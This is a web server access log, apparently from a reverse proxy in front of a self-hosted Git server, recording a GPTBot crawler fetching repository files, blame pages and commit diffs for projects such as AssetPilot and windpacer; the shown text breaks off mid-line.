+[17/Feb/2026:13:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" +[17/Feb/2026:13:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" +[17/Feb/2026:13:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" +[17/Feb/2026:13:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9933] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" +[17/Feb/2026:13:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 9938] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" +[17/Feb/2026:13:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" [Client 74.7.227.38] [Length 12529] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" +[17/Feb/2026:13:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" [Client 74.7.227.38] [Length 12528] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" +[17/Feb/2026:13:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" [Client 74.7.227.38] [Length 12529] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" +[17/Feb/2026:13:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" [Client 74.7.227.38] [Length 17121] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" +[17/Feb/2026:13:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10280] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:13:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10120] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" +[17/Feb/2026:13:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" [Client 74.7.227.38] [Length 11410] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" +[17/Feb/2026:13:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 17209] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" +[17/Feb/2026:13:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 234373] [Gzip 16.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" +[17/Feb/2026:13:37:40 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" +[17/Feb/2026:13:37:40 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" +[17/Feb/2026:13:37:41 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" +[17/Feb/2026:13:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" [Client 74.7.227.38] [Length 10262] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" +[17/Feb/2026:13:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/quarterly" [Client 74.7.227.38] [Length 8615] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" +[17/Feb/2026:13:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 17149] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" +[17/Feb/2026:13:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 17183] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" +[17/Feb/2026:13:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17176] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" +[17/Feb/2026:13:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 12754] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" +[17/Feb/2026:13:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 10832] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" +[17/Feb/2026:13:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 15794] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" +[17/Feb/2026:13:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 14303] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" +[17/Feb/2026:13:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 13428] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" +[17/Feb/2026:13:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 17176] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" +[17/Feb/2026:13:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 10903] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" +[17/Feb/2026:13:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 10901] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" +[17/Feb/2026:13:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 17356] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" +[17/Feb/2026:13:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 17373] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17379] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 14869] [Gzip 9.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 259720] [Gzip 13.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 18148] [Gzip 12.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 15450] [Gzip 8.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" +[17/Feb/2026:13:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 22879] [Gzip 13.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 72002] [Gzip 10.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:13:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" +[17/Feb/2026:13:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 17379] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 17667] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:13:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 66202] [Gzip 10.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:13:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr 